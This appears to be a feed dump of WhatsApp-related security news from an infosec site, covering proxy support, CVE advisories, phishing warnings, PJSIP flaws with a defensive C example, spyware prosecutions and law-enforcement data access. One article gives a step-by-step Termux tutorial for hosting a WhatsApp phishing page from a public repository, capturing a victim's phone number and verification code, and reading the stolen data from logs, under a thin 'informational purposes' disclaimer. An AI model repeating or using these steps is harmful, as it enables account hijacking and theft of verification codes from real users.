Information Security News|Cyber Security|Hacking Tutorial
https://www.securitynewspaper.com/
Information Security Newspaper|Infosec Articles|Hacking News
Thu, 05 Jan 2023 23:27:38 +0000

Now you can set up a proxy server to connect to WhatsApp if it's blocked in a country
https://www.securitynewspaper.com/2023/01/05/now-you-can-set-up-a-proxy-server-to-connect-to-whatsapp-if-its-blocked-in-a-country/
Thu, 05 Jan 2023 23:27:36 +0000

The post Now you can set up a proxy server to connect to WhatsApp if its blocked in a country appeared first on Information Security Newspaper | Hacking News.

Internet shutdowns are deliberate disturbances to internet access and digital communications. These disruptions are often carried out by governments in an effort to stifle the online speech of dissidents.

After demonstrations broke out throughout Iran in September over the execution of Mahsa Amini, the Iranian authorities shut down the internet to prevent people from going online.

Because of these shutdowns, many individuals are unable to communicate with their loved ones, WhatsApp said in a blog post. WhatsApp is owned by Meta, the firm controlled by Mark Zuckerberg.

In a message on their website, WhatsApp expressed their hope that “these internet shutdowns never occur” in the year 2023.

Disruptions such as the ones that have been going on for months and months in Iran deprive people of their human rights and prevent them from accessing needed assistance.

“However, in the event that these shutdowns persist, we hope that our option assists folks wherever there is a need for safe and dependable communication.”

Users will need to go to the Settings menu, choose ‘Storage and data,’ and then select ‘Proxy settings’ in order to turn on the option and input the address of a proxy server.

After being validated, it will establish the required connection between the user and the online resource or service that the user wishes to access.

According to WhatsApp, numerous proxy servers are put up throughout the globe by individuals and organizations to enable people to freely connect with one another.

In addition, it has developed a portal that instructs regular people on how to install a proxy server and “assist others connect.”

Even if proxy servers are used, WhatsApp communications will still be secured by a security standard known as end-to-end encryption. This protection is provided by WhatsApp itself.

With end-to-end encryption, the only people who can read a message are the two people participating in the conversation; no one else, not even the firm that owns the service, can access the information.

Every private communication that is transmitted using WhatsApp is said to be protected with end-to-end encryption by default. This messaging service was acquired by Zuckerberg’s company in 2014 for around $19 billion.

Despite this, end-to-end encryption is not a standard feature on any of the other Meta platforms.

For example, Facebook did not start testing end-to-end encryption as the default setting on the Messenger app until the previous year.

According to WhatsApp’s official statement, “connecting through proxy retains the same high degree of privacy and security that WhatsApp delivers.”

“Your personal messages will still be secured by end-to-end encryption,” which means that they will only be accessible to you and the person with whom you are conversing, and no one in between, including proxy servers, WhatsApp, or Meta, will be able to read them.

Two critical WhatsApp vulnerabilities allow hacking WhatsApp (Android & iOS) via call or video file. Update immediately
https://www.securitynewspaper.com/2022/09/26/two-critical-whatsapp-vulnerabilities-allow-hacking-whatsapp-android-ios-via-call-or-video-file-update-immediately/
Mon, 26 Sep 2022 20:23:10 +0000

Two security flaws in WhatsApp’s chat app for iOS and Android that might have been used to remotely execute malware on the device were recently reported by the company Meta.

CVE-2022-36934, which is rated severe (CVSS score of 9.8), affects all Android and iOS versions prior to v2.22.16.12, Business for Android prior to v2.22.16.12, and Business for iOS prior to v2.22.16.12. The root cause is an integer overflow in unspecified code of the Video Call Handler component; the manipulation leads to a heap-based buffer overflow, classified as CWE-122. The vulnerability was disclosed on 09/23/2022, and the advisory is available at whatsapp.com. The attack can be launched remotely. Technical details are not available.

Another flaw, identified as CVE-2022-27492, is an integer underflow that affects WhatsApp versions prior to 2.22.16.2 for Android and 2.22.15.9 for iOS. An attacker might take advantage of this weakness to run arbitrary code on the system by sending the system a specially crafted video file. This issue affects some unknown processing of the component Video File Handler. The manipulation leads to integer underflow. The CWE definition for the vulnerability is CWE-191. The weakness was disclosed 09/23/2022. The advisory is shared at whatsapp.com. The identification of this vulnerability is CVE-2022-27492. The attack may be initiated remotely. There are no technical details available. 

It is advised that WhatsApp users update to the most recent version to reduce the risk posed by the CVE-2022-36934 and CVE-2022-27492 issues. According to the company, there is no evidence that any of the vulnerabilities fixed in this version have been used maliciously.

Do not open this WhatsApp message offering Free Cadbury Chocolates; hackers can empty your bank accounts
https://www.securitynewspaper.com/2022/04/05/do-not-open-this-whatsapp-message-offering-free-cadbury-chocolates-hackers-can-empty-your-bank-accounts/
Tue, 05 Apr 2022 23:24:25 +0000

The famous Cadbury confectionery issued a statement warning its customers about a WhatsApp scam in which threat actors offer consumers a basket of free Easter chocolates, which they can claim through a link attached to this message.

The UK-based firm has confirmed that this is not a legitimate offer and users of the messaging app should ignore this alleged promotion: “We have been informed about social media posts claiming to offer consumers a basket of free Easter chocolate… We can confirm that this has not been generated by us and we urge consumers not to interact.”

Some users responded to one of the company’s posts on Twitter confirming that they had received the text message, and some replies included testimonies from victims who fell into the trap by clicking on the attached link.

British authorities also issued a warning about this phishing campaign, asking users to ignore these messages in the face of the potential risk of handing over their personal information to individuals with questionable intentions. Merseyside Police say they are aware of how difficult it is to refuse a free chocolate, but strongly ask users not to interact with those messages.

This seems to be clearly a phishing scam in which criminals create attractive messages in order to trick users into handing over their personal information, mainly through a link to a fraudulent website with forms for data registration.

Finally, the UK’s National Cyber Security Centre advised users in general to think twice before clicking on any similar links, opening unsolicited messages or downloading suspicious attachments. Indicators such as misspellings, shortened URLs, and low-resolution images can help identify a potential phishing attack.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

Check the integrity of the browser extension using this WhatsApp tool before running WhatsApp web
https://www.securitynewspaper.com/2022/03/11/check-the-integrity-of-the-browser-extension-using-this-whatsapp-tool-before-running-whatsapp-web/
Fri, 11 Mar 2022 18:24:29 +0000

Users of the WhatsApp version for laptops and desktops will now be able to use a browser extension to check the integrity of the software running on their browser. The extension is the result of a collaboration between Meta and Cloudflare.

End-to-end encryption in WhatsApp protects users’ messages from being read by intermediaries, although you can never have enough security, especially considering that things can change when users turn to the web version of the messaging app.

The extension was dubbed Code Verify and, according to Meta software engineer Richard Hansen, is based on a browser security feature called “subresource integrity,” which allows browsers to check if the files obtained have been altered in any way.

Code Verify analyzes the JavaScript code in WhatsApp Web, a process for which Cloudflare’s collaboration is required, since the high amount of resources required for a complete verification exceeds the capabilities of WhatsApp: “Cloudflare has a hash of the code that WhatsApp users should execute,” says the report on this extension.

When users run WhatsApp in their browser, WhatsApp’s code verification extension compares a hash of that code running in their browser to Cloudflare’s hash, allowing you to easily check if the code you’re running is the correct code.

At the moment, Code Verify is available for Google Chrome, Microsoft Edge, and Mozilla Firefox, with plans to expand to Safari in the short term. The tool runs immediately after installation to start validating WhatsApp JavaScript libraries. Its indicator is green when everything is valid, orange if the page needs to be updated or another extension interferes with Code Verify, and red if a hash discrepancy has been detected, indicating a possible compromise.

This integrity verification extension could make users of WhatsApp and other services that implement Code Verify less likely to install extensions that alter social media functions and raise potential security issues, strengthening the user experience in terms of cybersecurity.

5 critical vulnerabilities in the open-source API PJSIP affect millions of WhatsApp users. Update immediately
https://www.securitynewspaper.com/2022/03/02/5-critical-vulnerabilities-in-the-open-source-api-pjsip-affect-millions-of-whatsapp-users-update-immediately/
Wed, 02 Mar 2022 17:17:37 +0000

JFrog security teams report finding 5 vulnerabilities in PJSIP, a multimedia communication library developed by Teluu. According to the report, successful exploitation of these flaws would allow threat actors to achieve arbitrary code execution in applications using this library.

This library provides an API that can be used by IP telephony applications, such as VoIP phones and video conferencing applications. It is used today by the most popular communication apps in the world, such as WhatsApp and BlueJeans.

Below are brief descriptions of the reported flaws, in addition to their respective identification keys and scores assigned under the Common Vulnerability Scoring System (CVSS).

CVE-2021-43299 (CVSS 8.1/10): The flaw lies in pjsua_player_create, which creates a file player and automatically adds it to the conference bridge. This function contains a stack overflow vulnerability:

filename->ptr is copied to path without verifying that filename->slen is at most the size allocated for path, which is PJ_MAXPATH (260). Therefore, passing a file name longer than 260 characters will cause the stack to overflow.

CVE-2021-43300 & CVE-2021-43302 (CVSS 8.1/10): These flaws reside in pjsua_recorder_create(), which creates a file recorder and automatically connects this recorder to the conference bridge; they lead to a stack-based buffer overflow.

CVE-2021-43302 exists because pjsua_recorder_create does not check if the length of the file name is at least 4. If the file name is shorter than 4, pj_stricmp2 will cause an out-of-bounds read when comparing strings.

On the other hand, CVE-2021-43300 exists because filename->ptr is copied with memcpy to the path stack variable without verifying that filename->slen has at most the size assigned to the path, which is PJ_MAXPATH (260).

CVE-2021-43301 (CVSS 5.9/10): This is also a stack overflow flaw that affects pjsua_playlist_create, which creates a file playlist media port and automatically adds the port to the conference bridge. At startup, pjsua_playlist_create calls pjmedia_wav_playlist_create with the file_names argument assigned as file_list:

The function copies each file name from file_list to filename without checking whether its length is at most PJ_MAXPATH (260). If the file name is longer, a stack-based buffer overflow occurs.

CVE-2021-43303 (CVSS 5.9/10): Buffer overflow vulnerability in pjsua_call_dump, a function that dumps call statistics to a given buffer:

The function uses tmp to store the statistics temporarily and then copies them to the output argument buffer without checking whether len exceeds maxlen. This can cause a buffer overflow if the capacity of the given buffer parameter is less than len.
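
The bounds checks whose absence is described above, written as hardened helpers in C. This is an added example, not PJSIP's code and not taken from the JFrog report: counted_str, copy_filename, has_suffix, check_playlist and copy_dump are hypothetical names, the ".wav" sample is constructed, and only the 260-byte limit and the filename->ptr / filename->slen pair come from the article.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAXPATH 260 /* the size the article gives for PJ_MAXPATH */

/* Hypothetical counted string modelled on the filename->ptr / filename->slen
 * pair named in the article. The bytes are not necessarily NUL-terminated. */
typedef struct {
    const char *ptr;
    long slen;
} counted_str;

enum { CHECK_OK = 0, ERR_BAD_ARG = -1, ERR_TOO_LONG = -2, ERR_TOO_SHORT = -3 };

/* Pattern described for CVE-2021-43299 / CVE-2021-43300 (the "before"):
 *     char path[MAXPATH];
 *     memcpy(path, filename->ptr, filename->slen);   // slen never checked
 * Hardened form: reject any name that does not fit together with its
 * terminator, and reject negative lengths before they are cast to size_t. */
int copy_filename(char *path, size_t path_size, const counted_str *filename)
{
    if (!path || path_size == 0 || !filename || !filename->ptr || filename->slen < 0)
        return ERR_BAD_ARG;
    if ((size_t)filename->slen >= path_size)
        return ERR_TOO_LONG;
    memcpy(path, filename->ptr, (size_t)filename->slen);
    path[filename->slen] = '\0';
    return CHECK_OK;
}

/* Pattern described for CVE-2021-43302: the tail of the name is compared
 * without first checking that the name is at least as long as the tail,
 * so a short name makes the comparison start before the buffer.
 * Returns 1 on match, 0 on mismatch, or a negative error code. */
int has_suffix(const counted_str *filename, const char *suffix)
{
    size_t i, n;
    const char *tail;

    if (!filename || !filename->ptr || filename->slen < 0 || !suffix)
        return ERR_BAD_ARG;
    n = strlen(suffix);
    if ((size_t)filename->slen < n)
        return ERR_TOO_SHORT;
    tail = filename->ptr + ((size_t)filename->slen - n);
    for (i = 0; i < n; i++)
        if (tolower((unsigned char)tail[i]) != tolower((unsigned char)suffix[i]))
            return 0;
    return 1;
}

/* Pattern described for CVE-2021-43301: each list entry is copied into a
 * fixed buffer, so each entry needs the same check. Stops at the first error. */
int check_playlist(const counted_str *file_list, size_t count)
{
    char filename[MAXPATH];
    size_t i;

    for (i = 0; i < count; i++) {
        int rc = copy_filename(filename, sizeof filename, &file_list[i]);
        if (rc != CHECK_OK)
            return rc;
    }
    return CHECK_OK;
}

/* Pattern described for CVE-2021-43303: len bytes of tmp are copied into a
 * caller buffer of capacity maxlen. Hardened form truncates to the capacity
 * and always terminates. Returns the number of bytes copied. */
size_t copy_dump(char *buffer, size_t maxlen, const char *tmp, size_t len)
{
    size_t n;

    if (!buffer || maxlen == 0)
        return 0;
    n = (tmp && len < maxlen - 1) ? len : (tmp ? maxlen - 1 : 0);
    if (n)
        memcpy(buffer, tmp, n);
    buffer[n] = '\0';
    return n;
}

int main(void)
{
    char path[MAXPATH], longname[300], out[8];
    counted_str ok = { "call.wav", 8 }, tiny = { "a", 1 }, big;

    memset(longname, 'A', sizeof longname); /* constructed oversized name */
    big.ptr = longname;
    big.slen = 260;
    printf("8-byte name:   %d\n", copy_filename(path, sizeof path, &ok));
    printf("260-byte name: %d\n", copy_filename(path, sizeof path, &big));
    printf("1-byte name:   %d\n", has_suffix(&tiny, ".wav"));
    printf("dump copied:   %zu\n", copy_dump(out, sizeof out, "0123456789", 10));
    return 0;
}
```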

Fixing these flaws requires updating PJSIP to version 2.12, so developers recommend addressing the flaws as soon as possible.

This Mexican businessman was charged for selling phone interception tools and spyware to companies and government agencies in Latin America
https://www.securitynewspaper.com/2022/02/16/this-mexican-businessman-was-charged-for-selling-phone-interception-tools-and-spyware-to-companies-and-government-agencies-in-latin-america/
Wed, 16 Feb 2022 19:19:24 +0000

The U.S. Department of Justice (DOJ) has reported that Mexican businessman Carlos Guerrero pleaded guilty to conspiracy to sell and use hacking tools while serving as director of a commercial consortium he also owned. Between 2014 and 2017, Guerrero negotiated the purchase of various hacking, espionage and geolocation tools developed by firms based in Italy and Israel to later resell them to other entrepreneurs and even to representatives of the Government of Mexico.

The defendant marketed all sorts of tools and software solutions, including WiFi blockers and interceptors, IMSI receivers, spyware and other tools to hack messaging services such as WhatsApp, to potential customers in Mexico and the United States. According to the DOJ, many of his clients were politically and financially motivated.

In addition to the sale of these solutions, the defendant himself used some of the tools he purchased to intercept phone calls and spy on the emails of a rival trade consortium from Baja California, Mexico, in a deal costing nearly $25,000 USD.

U.S. Attorney Randy Grossman said, “This guilty plea will help stop the proliferation of digital tools used to compromise the safety of U.S. and Mexican citizens.” The prosecutor also reiterated his commitment to the detection and interruption of any cybercriminal operation in collaboration with the rest of government agencies.

So far it is unknown which companies and government agencies bought the software sold by Guerrero and which are the companies that sold these tools to the defendant. More information could be revealed when the case is closed. Guerrero is still waiting to hear his sentence.

How to hack WhatsApp easily with a very effective Termux WhatsApp phishing website
https://www.securitynewspaper.com/2022/01/22/how-to-hack-whatsapp-easily-with-a-very-effective-termux-whatsapp-phishing-website/
Sat, 22 Jan 2022 18:30:00 +0000

Phishing is one of the main cybersecurity threats today, since virtually anyone in the world uses smartphones, online accounts and other tools despite not having basic notions of computer security and security risks, say specialists in ethical hacking.

A growing trend within phishing is the compromise of WhatsApp accounts, the largest instant messaging platform in the world. Threat actors take advantage of the fact that minimal resources are required for the deployment of a phishing campaign against users of the application, using tools available in any forum of dubious reputation.

This time, the ethical hacking experts of the International Institute of Cyber Security (IICS) will show you a simple phishing attack to attack WhatsApp accounts, using just a few commands. As usual, we remind you that this article was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

This attack is based on Termux, the popular terminal emulator for Android devices that allows you to run a Linux environment on a smartphone with specific requirements. Once we have installed Termux, we will have to open the tool and write the following commands one by one (enter “y” when the system asks to choose between Y/N):

apt update
apt upgrade
apt install git
git clone https://github.com/Ignitetch/Whatsapp-phishing
apt install php
cd Whatsapp-phishing
php -S localhost:8080 

Next, experts in ethical hacking recommend opening the following address in the browser:

http://localhost:8080

The victim enters a number, for example:

+74959999999

In the next step, choose Sign In:

Now we must enter the code received on that phone number, for example 12345678

After logging in, it redirects the user to web.whatsapp.com:

Return to the terminal, ethical hacking experts mention:

Swipe right and in the window below, press New Session

On this menu, type the following command:

cat log.txt && cat logs.txt

In response, we will receive data from the victim:

A company that sends SMS OTP codes on behalf of Google, Twitter, Facebook, etc. also helps governments to get precise locations of users
https://www.securitynewspaper.com/2021/12/07/a-company-that-sends-sms-otp-codes-on-behalf-of-google-twitter-facebook-etc-also-helps-governments-to-get-precise-locations-of-users/
Tue, 07 Dec 2021 18:11:07 +0000

As a result of one of the most revealing cybersecurity investigations in recent times, the co-founder of Mitto AS, a well-known company that collaborates with some of the world’s leading firms to send security codes via SMS messages, has been accused of selling access to some users’ mobile devices, which would help various authoritarian governments.

Mitto is a firm based in Switzerland and specialized in providing automated SMS messaging services for marketing campaigns, sending security codes, reminders and other practical applications. Mitto currently works with hundreds of organizations in more than 100 locations. Among Mitto’s main clients are tech giants such as Google, WhatsApp, Twitter, LinkedIn and Telegram, even working with Asian firms such as TikTok, Tencent and Alibaba, not to mention their partners in the phone operator industry.

An investigation by the Bureau of Investigative Journalism and reports shared by former employees claim that Ilja Gorelik, co-founder of Mitto, has been secretly selling access to the company’s networks for the identification and tracking of target users through their mobile devices and online profiles. According to the report, users and business customers were completely unaware of this practice, as it was only known to a small group within Mitto.

Gorelik and his accomplices contacted some surveillance companies in order to sell this service to various government agencies.

After the report’s release, Mitto issued a statement denying any connection to a surveillance operation, and an internal investigation was ordered to identify any possible malicious use of the company’s technology: “We will take corrective action should it be necessary,” Mitto concludes. The company also did not add further details about Gorelik and it is unknown if he is still working at the company.

The reports obtained by the researchers clearly contradict Mitto’s official stance; two informants said that Gorelik ordered that custom software be added to the company’s networks to track certain users, a task carried out without any supervision, so they do not rule out its improper use.

Informants cited as an example a case in which the phone of a U.S. Department of State official was compromised for surveillance purposes in 2019. Former Mitto employees could not confirm which state actor was behind this follow-up campaign.

In addition to working with the aforementioned technology companies, Mitto collaborates with telephone operators such as Vodafone, Telefonica, MTN and Deutsche Telekom. When questioned, most of the companies declined to make any statement about it, while only one Vodafone representative responded by mentioning that they have collaborated with Mitto exclusively on SMS messaging services.

This investigation was possible thanks to the collaboration of dozens of people, including cybersecurity specialists and former employees of the company, in addition to the analysis of emails and internal documentation. While the people interviewed claim to have witnessed this practice, few people know the technical details behind the surveillance systems used by Mitto. The informants also mentioned that, to their knowledge, there is no evidence that this surveillance campaign has compromised additional information from companies using Mitto’s SMS service, although the company would have to allow a detailed investigation to know this for sure. 

These little-known practices, in addition to the work of firms such as NSO Group and its infamous Pegasus spyware, have become a national security issue for governments around the world, mainly in the U.S. Ron Wyden, a member of the U.S. Senate intelligence committee, mentions that, repeatedly, the U.S. Congress has warned about these security risks without the authorities being able to do anything about it.

At the moment, Mitto continues to address public relations issues, although everything seems to indicate that there is no intention to reveal more details about this surveillance system, which worries users, companies and privacy advocates alike.

Leaked FBI document reveals how the agency can access data from WhatsApp, WeChat, iMessage, Telegram, Line, Signal, Wickr and Facebook Messenger
https://www.securitynewspaper.com/2021/11/30/leaked-fbi-document-reveals-how-the-agency-can-access-data-from-whatsapp-wechat-imessage-telegram-line-signal-wickr-and-facebook-messenger/
Tue, 30 Nov 2021 21:49:17 +0000

We all know that social media platforms and instant messaging services are really unfriendly to the privacy of their users, although we are not always clear about how this invasion of our confidential information occurs. However, thanks to the work of Mallory Knodel and the Center for Democracy and Technology, it was possible to know how these companies share details that they should not.

Knodel shared with Rolling Stone a document from the Federal Bureau of Investigation (FBI) in which the Agency recognizes the ease with which it is possible to collect data from sources such as iMessage and WhatsApp, since only a court order is required. According to this document, Apple and Facebook applications are incredibly permissive when it comes to accessing their users’ information.

While Facebook (now known as Meta) and Apple have focused their marketing campaigns on the privacy of their services, hundreds of journalists, activists and users have pointed out how it is that law enforcement agencies exploit online platforms to extract information and collaborate with surveillance tasks in dozens of countries with repressive governments.

The FBI report, titled “Lawful Access” and published in early 2021, also emphasizes that these apps do a great job keeping hackers at bay, although it recognizes that users are completely vulnerable to the activity of law enforcement agencies, which can resort to various legal avenues for the extraction of confidential data stored by these companies.

In addition to acknowledging this practice, the document includes detailed guidance on the type of information the agency can access through these legal requests, which span the world’s top 9 messaging apps, including WhatsApp, WeChat, iMessage, Telegram, Line, Signal, Wickr, and Facebook Messenger.

This document details how the FBI has at its disposal a whole legal team to obtain access to large amounts of information in the most popular messaging apps, used by billions of people around the world, so we can think that no one is safe from government surveillance.

Cybersecurity specialists point out that it is too unusual for law enforcement agencies to be able to access so much information, so the issue should concern users, government agencies and activists.

U.S. Government offers $10 million USD reward for information leading to DarkSide ransomware operators
https://www.securitynewspaper.com/2021/11/05/u-s-government-offers-10-million-usd-reward-for-information-leading-to-darkside-ransomware-operators/
Fri, 05 Nov 2021 18:55:25 +0000

The post U.S. Government offers $10 million USD reward for information leading to DarkSide ransomware operators appeared first on Information Security Newspaper | Hacking News.

]]>
The U.S. Department of State announced that it is offering a reward of up to $10 million USD to anyone who provides information that leads to the identification and arrest of the operators of the DarkSide ransomware and any possible variants derived from this malware. Authorities are also offering a $5 million USD reward for information about those affiliated with this cybercriminal operation.

Those interested in participating in this special program can contact the authorities through the official website of the Federal Bureau of Investigation (FBI) and through messaging platforms such as WhatsApp, Telegram and Signal.

Authorities specify that the reward applies to variants derived from DarkSide, including name changes such as BlackMatter ransomware. It should be remembered that rebranding is a common practice among ransomware operators; when these groups feel cornered by the authorities, they decide to shut down their operation only to return a couple of months later, using another name but with the same malware variant.

In the case of DarkSide, this variant was rebranded as BlackMatter after the attack on Colonial Pipeline, which wreaked severe havoc and drew the attention of all U.S. authorities to the capabilities of ransomware groups.

This week, cybersecurity specialists reported that BlackMatter was about to close its operation, announcing the closure through its dark web platform. This does not appear to be an impediment for authorities to continue investigating members of this operation, whose identification and arrest have become a priority for the U.S. government.

Finally, the State Department announced a $10 million reward to anyone who provides information related to any threat actor sponsored by a nation state, hoping to mitigate the hackers’ ability to mount a new cybercriminal infrastructure immediately after shutting down the previous one.

New WhatsApp attack is hijacking hundreds of accounts: How to prevent it? https://www.securitynewspaper.com/2021/11/03/new-whatsapp-attack-is-hijacking-hundreds-of-accounts-how-to-prevent-it/ Wed, 03 Nov 2021 22:57:36 +0000

Cybersecurity experts recently detected a new way to hijack WhatsApp accounts and take control of users’ contact lists that could affect millions of people. The good news is that you can avoid falling victim to this attack variant.

Before getting started, users should know the tactics used by threat actors: the attack often starts with a text message posing as a contact on the user’s list. Thus, the user receives the text containing a six-digit number from the WhatsApp platform arriving from the chat of their contacts: “Can you lend me some money? I will return it to you within 2 hours, please”, reads the message sent by threat actors posing as a relative or friend of the victim. Below we can see an example of this scam, reported by an unknown user in Mexico:

This will ultimately lead to the victim losing some money or having their WhatsApp account hijacked by the hackers, who can then use it for further malicious tasks.

A fast and safe option to keep hackers away from our messaging platform accounts is enabling the two-factor authentication mechanism integrated in WhatsApp, which will request an additional identity validation. This setting can be configured directly from your WhatsApp account in less than 5 minutes.

The first step to follow is to go to WhatsApp settings and click on the Account option, which gives the option to carry out the two-step validation. Once there, you must add a password and an email address to your account to be able to reset your PIN in case you forget your password and thus protect your account.

The reason for the hack is still unknown; however, the most frequent reasons are usually to take control over accounts within the platform and then extort the user to collect a ransom or ask for money, among others.

The problem, which is added to the hack itself, is that the criminal is left with access to all your contacts to repeat the modus operandi and get new victims who fall into his trap, only this time impersonating them.

How police can try to get your Signal messaging apps records for investigation https://www.securitynewspaper.com/2021/11/01/how-police-can-try-to-get-your-signal-messaging-apps-records-for-investigation/ Mon, 01 Nov 2021 18:35:56 +0000

In hundreds of criminal investigation cases, authorities are always looking for information available from all sorts of sources, from oral testimony, evidence, and even posts and activity on social media and online platforms, including messaging apps.

Companies such as Facebook, Apple and various manufacturers of smartphones and other smart devices receive constant requests from the U.S. government to implement mechanisms that allow authorities to access confidential information on these platforms. To comply with these orders, platforms such as WhatsApp have begun to issue their own guidelines, rules that developers follow when delivering their users’ information to the authorities.

This is not the case with Signal, a messaging app focused on users’ privacy. According to a report by the company, the authorities continue to try to access the information of the users of this service, which is impossible considering that this platform does not store user information and such records do not exist on its servers.

In other words, Signal does not know the names, addresses, contact list, and call and message logs of any user.

In releasing a new subpoena received by its legal team, Signal confirmed that it sent authorities a response exactly the same as that issued with the previous subpoenas: In its dataset identified as “Account and Subscriber Information,” Signal only stores timestamps to identify when an account was created, last network connection, and other minor details.

In addition to the search warrant, the platform revealed that it received four consecutive non-disclosure orders on these requests. Signal concluded by mentioning that the court that issued the orders never confirmed receipt of a response or scheduled a hearing. The platform will continue to work continuously to maintain its commitment to user privacy, which needless to say does not violate any rule in current US legislation.
